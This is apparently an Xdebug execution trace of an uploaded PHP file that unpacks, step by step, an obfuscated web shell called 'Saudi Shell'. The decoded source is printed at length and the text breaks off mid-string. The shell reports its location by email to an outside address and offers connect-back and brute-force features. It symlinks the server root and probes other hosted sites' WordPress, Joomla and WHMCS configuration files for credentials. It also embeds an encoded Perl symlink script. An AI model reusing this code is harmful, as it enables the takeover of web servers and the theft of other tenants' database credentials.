Version: 3.1.0beta2 File format: 4 TRACE START [2023-02-12 23:01:11.677387] 1 0 1 0.000168 393528 1 3 0 0.000449 427176 {main} 1 /var/www/html/uploads/sauidi.php 0 0 1 A /var/www/html/uploads/sauidi.php 2 $gz = 'ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg==' 1 A /var/www/html/uploads/sauidi.php 3 $gzinflate = 'byy2YkbQg31f875vTgvlUUDjuc/Oq7RSwvrlwoh7aMsdclElZPiJ1kdLR2cd38kPWnnS3q2RlpdrLZrm2EUZ9xBsCLPamXWS+tphjHMWPC3YfEy+unB7uW28GrjsGVSS4AH4XsiHZ0d1ejoRfMROGodk8wL7BE+aUQnguwDFnvANRJ2qzJxxhNHwdPCEwPWlod1pKtY7koixbNNncZJihR91NE0KaetncuSv+bZCkZcWgy6vAkX3tt+eKaI8gRvE/eSinY2QWGT+39kDxi3Z2Yd6k5S7pSMs5BuXjCLMuBjJQ1Gg2JUgS9Q6yrgxLxiFRuOSWRcO3fJ4JEkEca0jvcDzFnAvToGq0zftO+QQH8fK6k0b3uN9tSKsJKazIkjBg4WR8TSpAoAPVNtOqAN88vUJ/IBw4si86SK3crNf3sQEPJrvAnsbcZHSqvZIqqenNXnCqp64PD2KYHnZ7u3iv5crXBny0fhJz9XX5V81nb16yOGVVJdrl5w1ZaVfhgO9' 2 4 0 0.000564 427176 base64_decode 0 /var/www/html/uploads/sauidi.php 4 1 'ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGd6aW5mbGF0ZSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUyOSUzQg==' 2 4 1 0.000593 427464 2 4 R 'eval%28%26quot%3B%3F%26gt%3B%26quot%3B.gzuncompress%28gzuncompress%28gzinflate%28gzinflate%28gzinflate%28base64_decode%28strrev%28%24gzinflate%29%29%29%29%29%29%29%29%3B' 2 5 0 0.000621 427432 urldecode 0 /var/www/html/uploads/sauidi.php 4 1 'eval%28%26quot%3B%3F%26gt%3B%26quot%3B.gzuncompress%28gzuncompress%28gzinflate%28gzinflate%28gzinflate%28base64_decode%28strrev%28%24gzinflate%29%29%29%29%29%29%29%29%3B' 2 5 1 0.000646 427688 2 5 R 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($gzinflate))))))));' 2 6 0 0.000671 427400 htmlspecialchars_decode 0 /var/www/html/uploads/sauidi.php 4 1 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($gzinflate))))))));' 2 6 1 0.000694 427624 2 6 R 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($gzinflate))))))));' 2 7 0 0.000733 429752 eval 1 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($gzinflate))))))));' /var/www/html/uploads/sauidi.php 4 0 3 8 0 0.000756 429752 strrev 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code 1 1 'byy2YkbQg31f875vTgvlUUDjuc/Oq7RSwvrlwoh7aMsdclElZPiJ1kdLR2cd38kPWnnS3q2RlpdrLZrm2EUZ9xBsCLPamXWS+tphjHMWPC3YfEy+unB7uW28GrjsGVSS4AH4XsiHZ0d1ejoRfMROGodk8wL7BE+aUQnguwDFnvANRJ2qzJxxhNHwdPCEwPWlod1pKtY7koixbNNncZJihR91NE0KaetncuSv+bZCkZcWgy6vAkX3tt+eKaI8gRvE/eSinY2QWGT+39kDxi3Z2Yd6k5S7pSMs5BuXjCLMuBjJQ1Gg2JUgS9Q6yrgxLxiFRuOSWRcO3fJ4JEkEca0jvcDzFnAvToGq0zftO+QQH8fK6k0b3uN9tSKsJKazIkjBg4WR8TSpAoAPVNtOqAN88vUJ/IBw4si86SK3crNf3sQEPJrvAnsbcZHSqvZIqqenNXnCqp64PD2KYHnZ7u3iv5crXBny0fhJz9XX5V81nb16yOGVVJdrl5w1ZaVfhgO9' 3 8 1 0.000837 462552 3 8 R 'ARZX6agBEVfuqAEMV/OoeJwBAVf+qHic7b1pe+LG0jD8+cl15T8oHCfge7yw2OPlHpwBDBgGYxsw2MzkcbQBMhJiJGGM5+T57W9VL1JLCGzPTHKWN5PYhu6u6urqqurqrfrHH979Oh1NJVu5cz3Z8VKb//vjD9KPP/x68uMP+B/Nfe/q3p1nWPqdaViGl0qTUu91x7GdO0ef2o5nTIYs2RikfjJcgEht3LXL7Xbtovkx6TkIqCd/29z8Im3MHDOPma1uufUxedbpXN6dXbQ7yd92gtRW+eq63O7cXbdqkJ58pzjS7sm1qztS7fJYSoZKnl90yneF09MWlEwFdQvob+4qF61eoXVaPsVPQMevyZSIJL7UTnIzeZxM0uZasmGmEo9v1ce3g8e3B+/tmWfa9nhHta3EVuLCde/aI90077I76cQWtpGAxTEh7zkzHTP/AG5JQGu13PmYdOcuZOWlJLDcmAzs5Kb0RdLVkS29Zym0d/RHw6PAJDPJesozPFM/' 3 9 0 0.000906 462520 base64_decode 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code 1 1 'ARZX6agBEVfuqAEMV/OoeJwBAVf+qHic7b1pe+LG0jD8+cl15T8oHCfge7yw2OPlHpwBDBgGYxsw2MzkcbQBMhJiJGGM5+T57W9VL1JLCGzPTHKWN5PYhu6u6urqqurqrfrHH979Oh1NJVu5cz3Z8VKb//vjD9KPP/x68uMP+B/Nfe/q3p1nWPqdaViGl0qTUu91x7GdO0ef2o5nTIYs2RikfjJcgEht3LXL7Xbtovkx6TkIqCd/29z8Im3MHDOPma1uufUxedbpXN6dXbQ7yd92gtRW+eq63O7cXbdqkJ58pzjS7sm1qztS7fJYSoZKnl90yneF09MWlEwFdQvob+4qF61eoXVaPsVPQMevyZSIJL7UTnIzeZxM0uZasmGmEo9v1ce3g8e3B+/tmWfa9nhHta3EVuLCde/aI90077I76cQWtpGAxTEh7zkzHTP/AG5JQGu13PmYdOcuZOWlJLDcmAzs5Kb0RdLVkS29Zym0d/RHw6PAJDPJesozPFM/' 3 9 1 0.001081 495320 3 9 R '\001\026W\001\021W\001\fWx\001\001Wxi{0u?(\034\'{\036\001\f\030\006c\0330q\0012\022b$aoU/RK\blLr7؆\037:\035M%[s=R\017ҏ?z\017\037}ޝgXiXJRuDZ;GڎgL,\030~2\\Hmܵv19\b\'"m\0343n1y\\ޝ];vV]j|8ɵ;RXJJ_tw\026L\005u\vo*\027^uZ>O@ǯɔ$Nr3yLZa\022oǷǷ\agxGVu#4;\0261!93\0353\000nI@kt.d$ܘ\fEՑ-g)wGã$3z3O@ǯɔ$Nr3yLZa\022oǷǷ\agxGVu#4;\0261!93\0353\000nI@kt.d$ܘ\fEՑ-g)wGã$3z3O@ǯɔ$Nr3yLZa\022oǷǷ\agxGVu#4;\0261!93\0353\000nI@kt.d$ܘ\fEՑ-g)wGã$3z3' 3 11 0 0.002460 454328 gzinflate 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code 1 1 '\001\021W\001\fWx\001\001Wxi{0u?(\034\'{\036\001\f\030\006c\0330q\0012\022b$aoU/RK\blLr7؆\037:\035M%[s=R\017ҏ?z\017\037}ޝgXiXJRuDZ;GڎgL,\030~2\\Hmܵv19\b\'"m\0343n1y\\ޝ];vV]j|8ɵ;RXJJ_tw\026L\005u\vo*\027^uZ>O@ǯɔ$Nr3yLZa\022oǷǷ\agxGVu#4;\0261!93\0353\000nI@kt.d$ܘ\fEՑ-g)wGã$3z3' 3 11 1 0.002990 478936 3 11 R '\001\fWx\001\001Wxi{0u?(\034\'{\036\001\f\030\006c\0330q\0012\022b$aoU/RK\blLr7؆\037:\035M%[s=R\017ҏ?z\017\037}ޝgXiXJRuDZ;GڎgL,\030~2\\Hmܵv19\b\'"m\0343n1y\\ޝ];vV]j|8ɵ;RXJJ_tw\026L\005u\vo*\027^uZ>O@ǯɔ$Nr3yLZa\022oǷǷ\agxGVu#4;\0261!93\0353\000nI@kt.d$ܘ\fEՑ-g)wGã$3z3 Ԅd' 3 12 0 0.003541 454328 gzinflate 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code 1 1 '\001\fWx\001\001Wxi{0u?(\034\'{\036\001\f\030\006c\0330q\0012\022b$aoU/RK\blLr7؆\037:\035M%[s=R\017ҏ?z\017\037}ޝgXiXJRuDZ;GڎgL,\030~2\\Hmܵv19\b\'"m\0343n1y\\ޝ];vV]j|8ɵ;RXJJ_tw\026L\005u\vo*\027^uZ>O@ǯɔ$Nr3yLZa\022oǷǷ\agxGVu#4;\0261!93\0353\000nI@kt.d$ܘ\fEՑ-g)wGã$3z3 Ԅd' 3 12 1 0.004093 478936 3 12 R 'x\001\001Wxi{0u?(\034\'{\036\001\f\030\006c\0330q\0012\022b$aoU/RK\blLr7؆\037:\035M%[s=R\017ҏ?z\017\037}ޝgXiXJRuDZ;GڎgL,\030~2\\Hmܵv19\b\'"m\0343n1y\\ޝ];vV]j|8ɵ;RXJJ_tw\026L\005u\vo*\027^uZ>O@ǯɔ$Nr3yLZa\022oǷǷ\agxGVu#4;\0261!93\0353\000nI@kt.d$ܘ\fEՑ-g)wGã$3z3 ԄdʓL\036B' 3 13 0 0.004642 454328 gzuncompress 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code 1 1 'x\001\001Wxi{0u?(\034\'{\036\001\f\030\006c\0330q\0012\022b$aoU/RK\blLr7؆\037:\035M%[s=R\017ҏ?z\017\037}ޝgXiXJRuDZ;GڎgL,\030~2\\Hmܵv19\b\'"m\0343n1y\\ޝ];vV]j|8ɵ;RXJJ_tw\026L\005u\vo*\027^uZ>O@ǯɔ$Nr3yLZa\022oǷǷ\agxGVu#4;\0261!93\0353\000nI@kt.d$ܘ\fEՑ-g)wGã$3z3 ԄdʓL\036B' 3 13 1 0.005134 478936 3 13 R 'xi{0u?(\034\'{\036\001\f\030\006c\0330q\0012\022b$aoU/RK\blLr7؆\037:\035M%[s=R\017ҏ?z\017\037}ޝgXiXJRuDZ;GڎgL,\030~2\\Hmܵv19\b\'"m\0343n1y\\ޝ];vV]j|8ɵ;RXJJ_tw\026L\005u\vo*\027^uZ>O@ǯɔ$Nr3yLZa\022oǷǷ\agxGVu#4;\0261!93\0353\000nI@kt.d$ܘ\fEՑ-g)wGã$3z3 ԄdʓL\036B\n~\a' 3 14 0 0.005623 454328 gzuncompress 0 /var/www/html/uploads/sauidi.php(4) : eval()'d code 1 1 'xi{0u?(\034\'{\036\001\f\030\006c\0330q\0012\022b$aoU/RK\blLr7؆\037:\035M%[s=R\017ҏ?z\017\037}ޝgXiXJRuDZ;GڎgL,\030~2\\Hmܵv19\b\'"m\0343n1y\\ޝ];vV]j|8ɵ;RXJJ_tw\026L\005u\vo*\027^uZ>O@ǯɔ$Nr3yLZa\022oǷǷ\agxGVu#4;\0261!93\0353\000nI@kt.d$ܘ\fEՑ-g)wGã$3z3 ԄdʓL\036B\n~\a' 3 14 1 0.006526 536280 3 14 R '\r\n\r\n\r\n\r\nUser IP: \'.$_SERVER[\'REMOTE_ADDR\'].(isset($_SERVER[\'HTTP_X_FORWARDED_FOR\'])?\'(\'.$_SERVER[\'HTTP_X_FORWARDED_FOR\'].\')\':\'\');\r\n @mail("x6cx6fx67@outlook.com","Oss_Shell_2.0",$url);\r\n $_SESSION[\'trimite\']=true;\r\n } if ($_GET[\'sws\']== \'phpinfo\') { echo @phpinfo();\r\n exit;\r\n } echo \'\r\n\r\' 3 15 0 0.009550 966208 eval 1 '?>\r\n\r\n\r\n\r\nUser IP: \'.$_SERVER[\'REMOTE_ADDR\'].(isset($_SERVER[\'HTTP_X_FORWARDED_FOR\'])?\'(\'.$_SERVER[\'HTTP_X_FORWARDED_FOR\'].\')\':\'\');\r\n @mail("x6cx6fx67@outlook.com","Oss_Shell_2.0",$url);\r\n $_SESSION[\'trimite\']=true;\r\n } if ($_GET[\'sws\']== \'phpinfo\') { echo @phpinfo();\r\n exit;\r\n } echo \'\r\n\r\n\r\n\'.$_SERVER[\'HTTP_HOST\'].\' ~ Saudi Sh3ll\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\';\r\n echo \'\r\n\r\n\r\n\r\n\t\t\t\r\n\r\n \r\n
\r\n
Saudi Shell
\r\n 		\r\n\r\n\';\r\n $pg = basename(__FILE__);\r\n echo "OS : ";\r\n $safe_mode = @ini_get(\'safe_mode\');\r\n $dir = @getcwd();\r\n $ip=$_SERVER[\'REMOTE_ADDR\'];\r\n $ips=$_SERVER[\'SERVER_ADDR\'];\r\n define(\'SWS\',\'al-swisre\');\r\n if ($os) { } else { $os = @php_uname();\r\n echo $os ;\r\n } echo " \r\n \r\n \r\n[ Google ]";\r\n echo " \r\n \r\n \r\n[ exploit-db ]";\r\n echo "
";\r\n echo (($safe_mode)?("safe_mode  \r\n: ON"):("safe_mode: OFF"));\r\n echo "
disable_functions : ";\r\n if(\'\'==($df=@ini_get(\'disable_functions\'))){echo "NONE";\r\n}else{ echo "$df";\r\n } echo "
Server : \r\n".$_SERVER[\'SERVER_SOFTWARE\']."
";\r\n echo "PHP version : ".@phpversion()."
";\r\n echo "Id : "."user = ".@get_current_user()." | uid= ".@getmyuid()." | gid= ".@getmygid()."
";\r\n echo "Pwd : ".$dir." \r\n \r\n".wsoPermsColor($dir)." \r\n \r\n[ Home ]


";\r\n echo "Your ip : \r\n$ip  \r\n \r\n\r\n\r\n | ip server : \r\n$ips\r\n\r\n|  \r\nlist site\r\n|  \r\nphpinfo |";\r\n echo "\r\n
\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n
\r\n\r\n\r\n\r\n \r\n\t\t\t");\r\n $ipb = @findit($read,"");\r\n $hostname = @findit($read,"Hostname:","
");\r\n $isp = @findit($r3ad,"ISP");\r\n echo "
\r\n\r\n\r\n
\r\n\r\n
File Manager

\r\n More info

\r\n Mysql Manager

\r\n bypass Security

\r\n Symlink

\r\n Connect Back

\r\n BruteForce

\r\n About Por
\r\n\r\n\r\n\r\n
\r\n\r\n ";\r\n echo \'\r\n\r\n		\r\n\r\n\';\r\n if(isset($_REQUEST[\'sws\'])) { switch ($_REQUEST[\'sws\']) { case \'sm\': $sws = \'al-swisre\' ;\r\n $mk = @mkdir(\'sym\',0777);\r\n $htcs = "Options all \\n DirectoryIndex Sux.html \\n AddType text/plain .php \\n AddHandler server-parsed .php \\n AddType text/plain .html \\n AddHandler txt .html \\n Require None \\n Satisfy Any";\r\n $f =@fopen (\'sym/.htaccess\',\'w\');\r\n @fwrite($f , $htcs);\r\n $sym = @symlink("/","sym/root");\r\n $pg = basename(__FILE__);\r\n echo \'
\r\n[ Symlink File ]\r\n\r\n[ User & Domains & Symlink ]\r\n\r\n[ Domains & Script ]\r\n\r\n[ Make Symlink Perl]\r\n


\' ;\r\n $sws = \'al-swisre\' ;\r\n if(isset($_REQUEST[\'sy\'])) { switch ($_REQUEST[\'sy\']) { case \'sec\': $d00m = @file("/etc/named.conf");\r\n if(!$d00m) { die (" can\'t read /etc/named.conf");\r\n } else { echo "
\r\n";\r\n foreach($d00m as $dom){ if(eregi("zone",$dom)){ preg_match_all(\'#zone "(.*)"#\', $dom, $domsws);\r\n flush();\r\n if(strlen(trim($domsws[1][0])) > 2){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));\r\n $wpl=$pageURL."/sym/root/home/".$user[\'name\']."/public_html/wp-config.php";\r\n $wpp=@get_headers($wpl);\r\n $wp=$wpp[0];\r\n $wp2=$pageURL."/sym/root/home/".$user[\'name\']."/public_html/blog/wp-config.php";\r\n $wpp2=@get_headers($wp2);\r\n $wp12=$wpp2[0];\r\n $jo1=$pageURL."/sym/root/home/".$user[\'name\']."/public_html/configuration.php";\r\n $joo=@get_headers($jo1);\r\n $jo=$joo[0];\r\n $jo2=$pageURL."/sym/root/home/".$user[\'name\']."/public_html/joomla/configuration.php";\r\n $joo2=@get_headers($jo2);\r\n $jo12=$joo2[0];\r\n $vb1=$pageURL."/sym/root/home/".$user[\'name\']."/public_html/includes/config.php";\r\n $vbb=@get_headers($vb1);\r\n $vb=$vbb[0];\r\n $vb2=$pageURL."/sym/root/home/".$user[\'name\']."/public_html/vb/includes/config.php";\r\n $vbb2=@get_headers($vb2);\r\n $vb12=$vbb2[0];\r\n $vb3=$pageURL."/sym/root/home/".$user[\'name\']."/public_html/forum/includes/config.php";\r\n $vbb3=@get_headers($vb3);\r\n $vb13=$vbb3[0];\r\n $wh1=$pageURL."/sym/root/home/".$user[\'name\']."public_html/clients/configuration.php";\r\n $whh2=@get_headers($wh1);\r\n $wh=$whh2[0];\r\n $wh2=$pageURL."/sym/root/home/".$user[\'name\']."/public_html/support/configuration.php";\r\n $whh2=@get_headers($wh2);\r\n $wh12=$whh2[0];\r\n $wh3=$pageURL."/sym/root/home/".$user[\'name\']."/public_html/client/configuration.php";\r\n $whh3=@get_headers($wh3);\r\n $wh13=$whh3[0];\r\n $wh5=$pageURL."/sym/root/home/".$user[\'name\']."/public_html/submitticket.php";\r\n $whh5=@get_headers($wh5);\r\n $wh15=$whh5[0];\r\n $wh4=$pageURL."/sym/root/home/".$user[\'name\']."/public_html/client/configuration.php";\r\n $whh4=@get_headers($wh4);\r\n $wh14=$whh4[0];\r\n $pos = strpos($wp, "200");\r\n $config=" \r\n";\r\n if (strpos($wp, "200") == true ) { $config="Wordpress";\r\n } elseif (strpos($wp12, "200") == true) { $config="Wordpress";\r\n } elseif (strpos($jo, "200") == true and strpos($wh15, "200") == true ) { $config=" WHMCS";\r\n } elseif (strpos($wh12, "200") == true) { $config =" WHMCS";\r\n } elseif (strpos($wh13, "200") == true) { $config =" WHMCS";\r\n } elseif (strpos($jo, "200") == true) { $config=" Joomla";\r\n } elseif (strpos($jo12, "200") == true) { $config=" Joomla";\r\n } elseif (strpos($vb, "200") == true) { $config=" vBulletin";\r\n } elseif (strpos($vb12, "200") == true) { $config=" vBulletin";\r\n } elseif (strpos($vb13, "200") == true) { $config=" vBulletin";\r\n } else { continue;\r\n } $site = $user[\'name\'] ;\r\n echo "\r\n";\r\n flush();\r\n exit;\r\n } } } } break;\r\n case \'sym\': $d00m = @file("/etc/named.conf");\r\n if(!$d00m) { die (" can\'t read /etc/named.conf");\r\n } else { echo "
Domains Script
".$domsws[1][0]."".$config."
";\r\n foreach($d00m as $dom){ if(eregi("zone",$dom)){ preg_match_all(\'#zone "(.*)"#\', $dom, $domsws);\r\n flush();\r\n if(strlen(trim($domsws[1][0])) > 2){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));\r\n $site = $user[\'name\'] ;\r\n @symlink("/","sym/root");\r\n $site = $domsws[1][0];\r\n $ir = \'ir\';\r\n $il = \'il\';\r\n if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) ) { $site = "
".$domsws[1][0]."
";\r\n } echo "\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n ";\r\n flush();\r\n } } } } break;\r\n case \'pl\': if (!is_dir(\'sa2\')){ $mk = @mkdir(\'sa2\',0777);\r\n if (is_file(\'sa2/perl.pl\')) { echo "Symlink Perl";\r\n @chmod(\'sa2/perl.pl\',0755);\r\n } else { $f2 =@fopen (\'sa2/perl.pl\',\'w\');\r\n $sml_perl = "IyEvdXNyL2Jpbi9wZXJsIC1JL2hvbWUvYWxqbm9mcWUvcHVibGljX2h0bWwvdHJhZmlxL2dvbmZpZy5wbA0KcHJpbnQgIkNvbnRlbnQtdHlwZTogdGV4dC9odG1sXG5cbiI7DQpwcmludCc8IURPQ1RZUEUgaHRtbCBQVUJMSUMgIi0vL1czQy8vRFREIFhIVE1MIDEuMCBUcmFuc2l0aW9uYWwvL0VOIiAiaHR0cDovL3d3dy53My5vcmcvVFIveGh0bWwxL0RURC94aHRtbDEtdHJhbnNpdGlvbmFsLmR0ZCI+DQo8aHRtbCB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94aHRtbCI+DQo8aGVhZD4NCjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtTGFuZ3VhZ2UiIGNvbnRlbnQ9ImVuLXVzIiAvPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgiIC8+DQo8dGl0bGU+W35dIFBhaW4gU3ltbGluazwvdGl0bGU+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KLm5ld1N0eWxlMSB7DQogZm9udC1mYW1pbHk6IFRhaG9tYTsNCiBmb250LXNpemU6IHgtc21hbGw7DQogZm9udC13ZWlnaHQ6IGJvbGQ7DQogY29sb3I6ICMwMEZGRkY7DQogIHRleHQtYWxpZ246IGNlbnRlcjsNCn0NCjwvc3R5bGU+DQo8L2hlYWQ+DQonOw0Kc3ViIGxpbHsNCiAgICAoJHVzZXIpID0gQF87DQokbXNyID0gcXh7cHdkfTsNCiRrb2xhPSRtc3IuIi8iLiR1c2VyOw0KJGtvbGE9fnMvXG4vL2c7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvdmIvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJ35+dkJ1bGxldGluMS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nfn52QnVsbGV0aW4yLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2ZvcnVtL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLid+fnZCdWxsZXRpbjMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2MvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJ35+dkJ1bGxldGluNC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25maWcucGhwJywka29sYS4nfn5QaHBiYjEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW0vaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJ35+UGhwYmIyLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLid+fldvcmRwcmVzczEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywka29sYS4nfn5Xb3JkcHJlc3MyLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5Kb29tbGExLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2Jsb2cvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid+fkpvb21sYTIudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvam9vbWxhL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5Kb29tbGEzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ35+V2htMS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG1jL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5XaG0yLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3N1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid+fldobTMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5XaG00LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JpbGxpbmdzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5XaG01LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JpbGxpbmcvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid+fldobTYudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50cy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ35+V2htNy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG1jcy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ35+V2htOC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9vcmRlci9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ35+V2htOS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9hZG1pbi9jb25mLnBocCcsJGtvbGEuJ35+NS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9hZG1pbi9jb25maWcucGhwJywka29sYS4nfn40LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZfZ2xvYmFsLnBocCcsJGtvbGEuJ35+aW52aXNpby50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlL2RiLnBocCcsJGtvbGEuJ35+Ny50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25uZWN0LnBocCcsJGtvbGEuJ35+OC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ta19jb25mLnBocCcsJGtvbGEuJ35+bWstcG9ydGFsZTEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaW5jbHVkZS9jb25maWcucGhwJywka29sYS4nfn4xMi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zZXR0aW5ncy5waHAnLCRrb2xhLid+flNtZi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlcy9mdW5jdGlvbnMucGhwJywka29sYS4nfn5waHBiYjMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaW5jbHVkZS9kYi5waHAnLCRrb2xhLid+fmluZmluaXR5LnR4dCcpOw0KfQ0KaWYgKCRFTlZ7J1JFUVVFU1RfTUVUSE9EJ30gZXEgJ1BPU1QnKSB7DQogIHJlYWQoU1RESU4sICRidWZmZXIsICRFTlZ7J0NPTlRFTlRfTEVOR1RIJ30pOw0KfSBlbHNlIHsNCiAgJGJ1ZmZlciA9ICRFTlZ7J1FVRVJZX1NUUklORyd9Ow0KfQ0KQHBhaXJzID0gc3BsaXQoLyYvLCAkYnVmZmVyKTsNCmZvcmVhY2ggJHBhaXIgKEBwYWlycykgew0KICAoJG5hbWUsICR2YWx1ZSkgPSBzcGxpdCgvPS8sICRwYWlyKTsNCiAgJG5hbWUgPX4gdHIvKy8gLzsNCiAgJG5hbWUgPX4gcy8lKFthLWZBLUYwLTldW2EtZkEtRjAtOV0pL3BhY2soIkMiLCBoZXgoJDEpKS9lZzsNCiAgJHZhbHVlID1+IHRyLysvIC87DQogICR2YWx1ZSA9fiBzLyUoW2EtZkEtRjAtOV1bYS1mQS1GMC05XSkvcGFjaygiQyIsIGhleCgkMSkpL2VnOw0KICAkRk9STXskbmFtZX0gPSAkdmFsdWU7DQp9DQppZiAoJEZPUk17cGFzc30gZXEgIiIpew0KcHJpbnQgJw0KPGJvZHkgY2xhc3M9Im5ld1N0eWxlMSIgYmdjb2xvcj0iIzAwMDAwMCI+DQogPGJyIC8+PGJyIC8+DQo8Zm9ybSBtZXRob2Q9InBvc3QiPg0KPHRleHRhcmVhIG5hbWU9InBhc3MiIHN0eWxlPSJib3JkZXI6MnB4IGRvdHRlZCAjMDAzMzAwOyB3aWR0aDogNTQzcHg7IGhlaWdodDogNDIwcHg7IGJhY2tncm91bmQtY29sb3I6IzBDMEMwQzsgZm9udC1mYW1pbHk6VGFob21hOyBmb250LXNpemU6OHB0OyBjb2xvcjojRkZGRkZGIiAgPjwvdGV4dGFyZWE+PGJyIC8+DQombmJzcDs8cD4NCjxpbnB